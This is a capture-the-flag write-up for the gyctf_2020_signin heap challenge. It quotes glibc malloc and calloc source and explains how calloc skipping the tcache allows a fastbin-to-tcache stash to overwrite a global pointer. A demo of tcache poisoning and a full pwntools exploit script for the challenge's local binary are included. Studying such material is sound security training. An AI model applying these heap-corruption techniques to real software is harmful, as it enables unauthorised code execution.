gyctf_2020_signin

License

This article quotes portions of source code from the GNU C Library; the code is taken from the GNU C Library and is licensed under the LGPLv2.1.

Note: this challenge runs on glibc 2.27-3ubuntu1_amd64, but all glibc code shown in this article is from glibc 2.34.

WriteUp-gyctf_2020_signin

Dear readers, allow Y7n05h to dig out once more this piece of code that everyone knows inside out. Notice that taking a chunk out of a non-empty tcache is done in __libc_malloc(), not in _int_malloc().

void *
__libc_malloc (size_t bytes)
{
  mstate ar_ptr;
  void *victim;

  _Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2,
                  "PTRDIFF_MAX is not more than half of SIZE_MAX");

  if (!__malloc_initialized)
    ptmalloc_init ();
#if USE_TCACHE
  /* int_free also calls request2size, be careful to not pad twice.  */
  size_t tbytes;
  if (!checked_request2size (bytes, &tbytes))
    {
      __set_errno (ENOMEM);
      return NULL;
    }
  size_t tc_idx = csize2tidx (tbytes);

  MAYBE_INIT_TCACHE ();

  DIAG_PUSH_NEEDS_COMMENT;
  if (tc_idx < mp_.tcache_bins
      && tcache
      && tcache->counts[tc_idx] > 0)
    {
      victim = tcache_get (tc_idx);
      return tag_new_usable (victim);
    }
  DIAG_POP_NEEDS_COMMENT;
#endif

  if (SINGLE_THREAD_P)
    {
      victim = tag_new_usable (_int_malloc (&main_arena, bytes));
      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
              &main_arena == arena_for_chunk (mem2chunk (victim)));
      return victim;
    }

  arena_get (ar_ptr, bytes);

  victim = _int_malloc (ar_ptr, bytes);
  /* Retry with another arena only if we were able to find a usable arena
     before.  */
  if (!victim && ar_ptr != NULL)
    {
      LIBC_PROBE (memory_malloc_retry, 1, bytes);
      ar_ptr = arena_get_retry (ar_ptr, bytes);
      victim = _int_malloc (ar_ptr, bytes);
    }

  if (ar_ptr != NULL)
    __libc_lock_unlock (ar_ptr->mutex);

  victim = tag_new_usable (victim);

  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
          ar_ptr == arena_for_chunk (mem2chunk (victim)));
  return victim;
}

Now look at __libc_calloc():

void *
__libc_calloc (size_t n, size_t elem_size)
{
  mstate av;
  mchunkptr oldtop;
  INTERNAL_SIZE_T sz, oldtopsize;
  void *mem;
  unsigned long clearsize;
  unsigned long nclears;
  INTERNAL_SIZE_T *d;
  ptrdiff_t bytes;

  if (__glibc_unlikely (__builtin_mul_overflow (n, elem_size, &bytes)))
    {
      __set_errno (ENOMEM);
      return NULL;
    }

  sz = bytes;

  if (!__malloc_initialized)
    ptmalloc_init ();

  MAYBE_INIT_TCACHE ();

  if (SINGLE_THREAD_P)
    av = &main_arena;
  else
    arena_get (av, sz);

  if (av)
    {
      /* Check if we hand out the top chunk, in which case there may be no
         need to clear. */
#if MORECORE_CLEARS
      oldtop = top (av);
      oldtopsize = chunksize (top (av));
# if MORECORE_CLEARS < 2
      /* Only newly allocated memory is guaranteed to be cleared.  */
      if (av == &main_arena &&
          oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
        oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
# endif
      if (av != &main_arena)
        {
          heap_info *heap = heap_for_ptr (oldtop);
          if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
            oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
        }
#endif
    }
  else
    {
      /* No usable arenas.  */
      oldtop = 0;
      oldtopsize = 0;
    }
  mem = _int_malloc (av, sz);

  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
          av == arena_for_chunk (mem2chunk (mem)));

  if (!SINGLE_THREAD_P)
    {
      if (mem == 0 && av != NULL)
        {
          LIBC_PROBE (memory_calloc_retry, 1, sz);
          av = arena_get_retry (av, sz);
          mem = _int_malloc (av, sz);
        }

      if (av != NULL)
        __libc_lock_unlock (av->mutex);
    }

  /* Allocation failed even after a retry.  */
  if (mem == 0)
    return 0;

  mchunkptr p = mem2chunk (mem);

  /* If we are using memory tagging, then we need to set the tags
     regardless of MORECORE_CLEARS, so we zero the whole block while
     doing so.  */
  if (__glibc_unlikely (mtag_enabled))
    return tag_new_zero_region (mem, memsize (p));

  INTERNAL_SIZE_T csz = chunksize (p);

  /* Two optional cases in which clearing not necessary */
  if (chunk_is_mmapped (p))
    {
      if (__builtin_expect (perturb_byte, 0))
        return memset (mem, 0, sz);

      return mem;
    }

#if MORECORE_CLEARS
  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
    {
      /* clear only the bytes from non-freshly-sbrked memory */
      csz = oldtopsize;
    }
#endif

  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
     contents have an odd number of INTERNAL_SIZE_T-sized words;
     minimally 3.  */
  d = (INTERNAL_SIZE_T *) mem;
  clearsize = csz - SIZE_SZ;
  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
  assert (nclears >= 3);

  if (nclears > 9)
    return memset (d, 0, clearsize);

  else
    {
      *(d + 0) = 0;
      *(d + 1) = 0;
      *(d + 2) = 0;
      if (nclears > 4)
        {
          *(d + 3) = 0;
          *(d + 4) = 0;
          if (nclears > 6)
            {
              *(d + 5) = 0;
              *(d + 6) = 0;
              if (nclears > 8)
                {
                  *(d + 7) = 0;
                  *(d + 8) = 0;
                }
            }
        }
    }

  return mem;
}

As you can see, the difference between __libc_calloc() and __libc_malloc() is small; in most cases it is reasonable to think of __libc_calloc() as __libc_malloc() + memset(). There is one further difference, though: __libc_calloc() lacks the fast path that takes a chunk out of a non-empty tcache, so calloc() will serve requests from the fastbin first.
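To make this concrete, here is a minimal standalone sketch of that behavior (my own demo, not part of the challenge; it assumes glibc 2.27 on x86-64, where a 0x78 request gives a 0x80 chunk that is both tcache- and fastbin-sized):

#include <stdio.h>
#include <stdlib.h>

int main (void)
{
  void *p[8];

  for (int i = 0; i < 8; i++)
    p[i] = malloc (0x78);          /* chunk size 0x80 */
  for (int i = 0; i < 8; i++)
    free (p[i]);                   /* p[0..6] fill the tcache bin, p[7] enters the fastbin */

  void *a = malloc (0x78);         /* served from the tcache (LIFO head: p[6]) */
  void *b = calloc (1, 0x78);      /* skips the tcache, taken from the fastbin: p[7] */

  printf ("malloc: %p (== p[6], from tcache)\n", a);
  printf ("calloc: %p (== p[7], from fastbin)\n", b);
  return 0;
}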

This behavior is the core idea behind the exploitation of this challenge.

Failed approach: tcache poisoning

Y7n05h also started out trying to solve this challenge with tcache poisoning, hoping that the free/malloc process would clear cnt and allow a second edit. Unfortunately, that road leads nowhere: this way you can get a chunk allocated on top of ptr, but you cannot modify the value of ptr itself (at least Y7n05h could not think of how).
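For comparison, here is a minimal sketch of what generic tcache poisoning gives you (my own demo, assuming glibc 2.27 with no safe-linking and a use-after-free write primitive); it shows why it only yields an allocation at the target, not a write of a useful value into it:

#include <stdio.h>
#include <stdlib.h>

long target;  /* stand-in for the challenge's ptr */

int main (void)
{
  void *a = malloc (0x18);
  void *b = malloc (0x18);
  free (a);
  free (b);                      /* tcache: b -> a, count == 2 */

  *(void **) b = &target;        /* UAF write: b's next now points at target */

  malloc (0x18);                 /* returns b, list head moves to &target */
  void *evil = malloc (0x18);    /* returns &target */
  printf ("evil = %p, &target = %p\n", evil, (void *) &target);

  /* We now control memory AT target -- but malloc itself never wrote a
     useful non-NULL value INTO target, and writing one would need another
     edit, which this challenge does not grant.  */
  return 0;
}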

The correct approach

This approach was learned from Pwnki's blog; many thanks to Pwnki.

The exploitation plan:

  1. Allocate 8 chunks of size 0x80, then free them all: the first 7 fill up the tcache, and the last one goes into the fastbin.
  2. Allocate one more chunk; this takes a chunk out of the tcache.
  3. Overwrite the fd pointer of the chunk that entered the fastbin in step 1 with ptr - 0x10. Note that this makes glibc treat ptr - 0x10 as a chunk, and ptr then becomes that chunk's fd (see the layout sketch after this list).
  4. Trigger the backdoor, whose call to calloc takes the chunk out of the fastbin and inserts the "chunk" at ptr - 0x10 pointed to by its fd into the tcache list. During the insertion, ptr is overwritten as the next field of a tcache_entry.
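The overlap in step 3 works because on x86-64 the user pointer of a chunk lies 0x10 bytes past the start of its header, so the chunk's fd and a tcache_entry's next field both land exactly on ptr. A hypothetical view of the fake chunk (the struct name is made up for illustration; glibc's real type is struct malloc_chunk):

struct fake_chunk_view
{
  size_t prev_size;  /* at ptr - 0x10: start of the fake chunk header */
  size_t size;       /* at ptr - 0x08 */
  void *fd;          /* at ptr: overlaps tcache_entry.next, which is exactly
                        where the tcache insertion writes */
};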

The relevant glibc code for these steps:

typedef struct tcache_entry
{
  struct tcache_entry *next;
  /* This field exists to detect double frees.  */
  uintptr_t key;
} tcache_entry;
#define REMOVE_FB(fb, victim, pp)			\
  do							\
    {							\
      victim = pp;					\
      if (victim == NULL)				\
	break;						\
      pp = REVEAL_PTR (victim->fd);                                     \
      if (__glibc_unlikely (pp != NULL && misaligned_chunk (pp)))       \
	malloc_printerr ("malloc(): unaligned fastbin chunk detected"); \
    }							\
  while ((pp = catomic_compare_and_exchange_val_acq (fb, pp, victim)) \
	 != victim);					\
	  /* While we're here, if we see other chunks of the same size,
	     stash them in the tcache.  */
	  size_t tc_idx = csize2tidx (nb);
	  if (tcache && tc_idx < mp_.tcache_bins)
	    {
	      mchunkptr tc_victim;

	      /* While bin not empty and tcache not full, copy chunks.  */
	      while (tcache->counts[tc_idx] < mp_.tcache_count
		     && (tc_victim = *fb) != NULL)
		{
		  if (__glibc_unlikely (misaligned_chunk (tc_victim)))
		    malloc_printerr ("malloc(): unaligned fastbin chunk detected 3");
		  if (SINGLE_THREAD_P)
		    *fb = REVEAL_PTR (tc_victim->fd);
		  else
		    {
		      REMOVE_FB (fb, pp, tc_victim);
		      if (__glibc_unlikely (tc_victim == NULL))
			break;
		    }
		  tcache_put (tc_victim, tc_idx);
		}
	    }
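The write to ptr in step 4 happens inside the tcache_put() call at the end of this loop. For reference, its definition in the same 2.34 sources (e->next overlaps the chunk's fd, and the new entry becomes the head of the bin):

/* Caller must ensure that we know tc_idx is valid and there's room
   for more chunks.  */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache_key;

  e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}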

One caveat: the 2.34 code above mangles fastbin and tcache pointers with PROTECT_PTR/REVEAL_PTR (safe-linking, added in glibc 2.32) and checks chunk alignment; the 2.27 runtime of this challenge does neither, which is why overwriting fd with a raw pointer works.

Full exploit:

from pwn import *

path = '/home/admin/Downloads/gyctf_2020_signin'
elf = ELF(path)
r = process(path)


def i2b(n: int, Hex: bool = False):
    return bytes(hex(n) if Hex else str(n), encoding="ascii")


def backdoor():
    r.sendafter(b"?", b'6')


def add(idx: int):
    r.sendafter(b"?", b'1')
    r.sendafter(b"idx?\n", i2b(idx))


def delete(idx: int):
    r.sendafter(b"?", b'3')
    r.sendafter(b"idx?\n", i2b(idx))


def edit(idx: int, content: bytes):
    r.sendafter(b"?", b'2')
    r.sendafter(b"idx?\n", i2b(idx))
    r.send(content)


addr = elf.symbols['ptr'] - 0x10   # fake chunk header right before ptr

# Step 1: 8 allocations, 8 frees -- 7 fill the tcache, the 8th enters the fastbin.
for i in range(8):
    add(i)
for i in range(8):
    delete(i)

# Step 2: take one chunk back out of the tcache.
add(8)

# Step 3: overwrite the fastbin chunk's fd with ptr - 0x10.
payload = p64(addr)
edit(7, payload)

# Step 4: the backdoor's calloc() pulls from the fastbin; stashing the fake
# chunk into the tcache then overwrites ptr (as tcache_entry.next) with the
# old list head, a non-NULL value.
backdoor()
r.interactive()

References

1. Pwnki-gyctf_2020_signin.
2. PYozo_free-gyctf_2020_signin.